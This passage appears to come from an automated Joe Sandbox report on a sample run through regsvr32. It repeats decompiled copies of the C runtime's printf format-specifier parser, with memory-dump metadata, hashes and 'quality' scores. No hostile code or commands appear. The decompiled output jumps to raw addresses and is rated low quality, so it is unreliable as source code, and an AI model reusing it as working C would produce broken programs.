                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3dcb0
                                                                    0x7fef9d3dcbf
                                                                    0x7fef9d3dcc9
                                                                    0x7fef9d3dcd3
                                                                    0x7fef9d3dcdd
                                                                    0x7fef9d3dce7
                                                                    0x7fef9d3dce9
                                                                    0x7fef9d3dcf2
                                                                    0x7fef9d3dcf6
                                                                    0x7fef9d3dcff
                                                                    0x7fef9d3dd03
                                                                    0x7fef9d3dd0c
                                                                    0x7fef9d3dd10
                                                                    0x7fef9d3dd16
                                                                    0x7fef9d3dd1e
                                                                    0x7fef9d3dd27
                                                                    0x7fef9d3dd3b
                                                                    0x7fef9d3dd3d
                                                                    0x7fef9d3dd4a
                                                                    0x7fef9d3dd53
                                                                    0x7fef9d3dd5c
                                                                    0x7fef9d3dd66
                                                                    0x7fef9d3dd6a
                                                                    0x7fef9d3dd7f
                                                                    0x7fef9d3dd88
                                                                    0x7fef9d3dda0
                                                                    0x7fef9d3dda2
                                                                    0x7fef9d3ddaf
                                                                    0x7fef9d3ddb8
                                                                    0x7fef9d3ddba
                                                                    0x7fef9d3ddc2
                                                                    0x7fef9d3ddd7
                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 530996419-1247675978
                                                                    • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                    • Instruction ID: decea58dbdbd6501be5c610137b77bb3c0dc28cbce38a3a9de9bceb14a18b164
                                                                    • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                    • Instruction Fuzzy Hash: 1F510CB2A0C6C68AE7B09B64F8407BEB7E0F385346F600125D6C9869A8D77DE444DF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 26%
                                                                    			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                    				void* _t139;
                                                                    				char* _t159;
                                                                    				char* _t160;
                                                                    
                                                                    				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                                    				_t159 =  &_a1112;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t159);
                                                                    				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3bdd5;
                                                                    				_a88 = _t139 + _t159 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                    				_t160 =  &_a1112;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t160);
                                                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3be2d;
                                                                    				_a116 = _t139 + _t160 - 0x30;
                                                                    				_a972 = _a696 & 0x000000ff;
                                                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                    				goto 0xf9d3bfd9;
                                                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                    				_a1096 = _a1096 + 1;
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3beb2;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xf");
                                                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                    				goto 0xf9d3bfbe;
                                                                    				_a704 = 0;
                                                                    				goto E000007FE7FEF9D3BB66;
                                                                    				goto 0xf9d3bfd9;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3bd8d
                                                                    0x7fef9d3bd8f
                                                                    0x7fef9d3bd9c
                                                                    0x7fef9d3bda5
                                                                    0x7fef9d3bdae
                                                                    0x7fef9d3bdb8
                                                                    0x7fef9d3bdbc
                                                                    0x7fef9d3bdd1
                                                                    0x7fef9d3bdda
                                                                    0x7fef9d3bdf2
                                                                    0x7fef9d3bdf4
                                                                    0x7fef9d3be01
                                                                    0x7fef9d3be0a
                                                                    0x7fef9d3be0c
                                                                    0x7fef9d3be14
                                                                    0x7fef9d3be29
                                                                    0x7fef9d3be3a
                                                                    0x7fef9d3be49
                                                                    0x7fef9d3be53
                                                                    0x7fef9d3be61
                                                                    0x7fef9d3be6b
                                                                    0x7fef9d3be71
                                                                    0x7fef9d3be84
                                                                    0x7fef9d3be91
                                                                    0x7fef9d3be9d
                                                                    0x7fef9d3bea5
                                                                    0x7fef9d3beae
                                                                    0x7fef9d3beb2
                                                                    0x7fef9d3bebb
                                                                    0x7fef9d3bed1
                                                                    0x7fef9d3bee2
                                                                    0x7fef9d3bef0
                                                                    0x7fef9d3befc
                                                                    0x7fef9d3bf04
                                                                    0x7fef9d3bf17
                                                                    0x7fef9d3bf28
                                                                    0x7fef9d3bf36
                                                                    0x7fef9d3bf42
                                                                    0x7fef9d3bf4a
                                                                    0x7fef9d3bf5a
                                                                    0x7fef9d3bf6a
                                                                    0x7fef9d3bf7a
                                                                    0x7fef9d3bf8a
                                                                    0x7fef9d3bf9a
                                                                    0x7fef9d3bfaa
                                                                    0x7fef9d3bfac
                                                                    0x7fef9d3bfae
                                                                    0x7fef9d3bfb9
                                                                    0x7fef9d3bfbe
                                                                    0x7fef9d3bfc7
                                                                    0x7fef9d3bfcb
                                                                    0x7fef9d3bfd1
                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2576288505-192189897
                                                                    • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                    • Instruction ID: 7af9cebcf9cdbe51cb5c05a1613d0acac690945035c75598d7829d850d960732
                                                                    • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                    • Instruction Fuzzy Hash: 40515E72A0D6C68AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD540CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 26%
                                                                    			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                    				void* _t139;
                                                                    				char* _t159;
                                                                    				char* _t160;
                                                                    
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                    				_t159 =  &_a1560;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t159);
                                                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3dd83;
                                                                    				_a88 = _t139 + _t159 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                    				_t160 =  &_a1560;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t160);
                                                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3dddb;
                                                                    				_a116 = _t139 + _t160 - 0x30;
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3dd3b
                                                                    0x7fef9d3dd3d
                                                                    0x7fef9d3dd4a
                                                                    0x7fef9d3dd53
                                                                    0x7fef9d3dd5c
                                                                    0x7fef9d3dd66
                                                                    0x7fef9d3dd6a
                                                                    0x7fef9d3dd7f
                                                                    0x7fef9d3dd88
                                                                    0x7fef9d3dda0
                                                                    0x7fef9d3dda2
                                                                    0x7fef9d3ddaf
                                                                    0x7fef9d3ddb8
                                                                    0x7fef9d3ddba
                                                                    0x7fef9d3ddc2
                                                                    0x7fef9d3ddd7
                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2576288505-734865713
                                                                    • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                    • Instruction ID: f5bf503dfe25a3916c99f1d9d67644448d63221e22ccd8ab12d6653ca93a9968
                                                                    • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                    • Instruction Fuzzy Hash: 0E510DB2A0C6C28AE7F09B64E8407BEB7E4F394345F600126E6C9879A9DB7DD445CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 24%
                                                                    			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                    				void* _t113;
                                                                    				char* _t133;
                                                                    
                                                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                    				_t133 =  &_a1112;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t133);
                                                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3be2d;
                                                                    				_a116 = _t113 + _t133 - 0x30;
                                                                    				_a972 = _a696 & 0x000000ff;
                                                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                    				goto 0xf9d3bfd9;
                                                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                    				_a1096 = _a1096 + 1;
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3beb2;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xf");
                                                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                    				goto 0xf9d3bfbe;
                                                                    				_a704 = 0;
                                                                    				goto E000007FE7FEF9D3BB66;
                                                                    				goto 0xf9d3bfd9;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}





                                                                    0x7fef9d3bdf2
                                                                    0x7fef9d3bdf4
                                                                    0x7fef9d3be01
                                                                    0x7fef9d3be0a
                                                                    0x7fef9d3be0c
                                                                    0x7fef9d3be14
                                                                    0x7fef9d3be29
                                                                    0x7fef9d3be3a
                                                                    0x7fef9d3be49
                                                                    0x7fef9d3be53
                                                                    0x7fef9d3be61
                                                                    0x7fef9d3be6b
                                                                    0x7fef9d3be71
                                                                    0x7fef9d3be84
                                                                    0x7fef9d3be91
                                                                    0x7fef9d3be9d
                                                                    0x7fef9d3bea5
                                                                    0x7fef9d3beae
                                                                    0x7fef9d3beb2
                                                                    0x7fef9d3bebb
                                                                    0x7fef9d3bed1
                                                                    0x7fef9d3bee2
                                                                    0x7fef9d3bef0
                                                                    0x7fef9d3befc
                                                                    0x7fef9d3bf04
                                                                    0x7fef9d3bf17
                                                                    0x7fef9d3bf28
                                                                    0x7fef9d3bf36
                                                                    0x7fef9d3bf42
                                                                    0x7fef9d3bf4a
                                                                    0x7fef9d3bf5a
                                                                    0x7fef9d3bf6a
                                                                    0x7fef9d3bf7a
                                                                    0x7fef9d3bf8a
                                                                    0x7fef9d3bf9a
                                                                    0x7fef9d3bfaa
                                                                    0x7fef9d3bfac
                                                                    0x7fef9d3bfae
                                                                    0x7fef9d3bfb9
                                                                    0x7fef9d3bfbe
                                                                    0x7fef9d3bfc7
                                                                    0x7fef9d3bfcb
                                                                    0x7fef9d3bfd1
                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2576288505-192189897
                                                                    • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                    • Instruction ID: 7a8513096c3cb2bd444751f94b1f2e61cedcdb1a9580f93edff9428065c01d53
                                                                    • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                    • Instruction Fuzzy Hash: 0C415B72A0DAC28AE7F0DB24E8947BEB7E4E384745F600126D6DD869A9DB3DD541CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 24%
                                                                    			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                    				void* _t113;
                                                                    				char* _t133;
                                                                    
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                    				_t133 =  &_a1560;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t133);
                                                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3dddb;
                                                                    				_a116 = _t113 + _t133 - 0x30;
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}





                                                                    0x7fef9d3dda0
                                                                    0x7fef9d3dda2
                                                                    0x7fef9d3ddaf
                                                                    0x7fef9d3ddb8
                                                                    0x7fef9d3ddba
                                                                    0x7fef9d3ddc2
                                                                    0x7fef9d3ddd7
                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
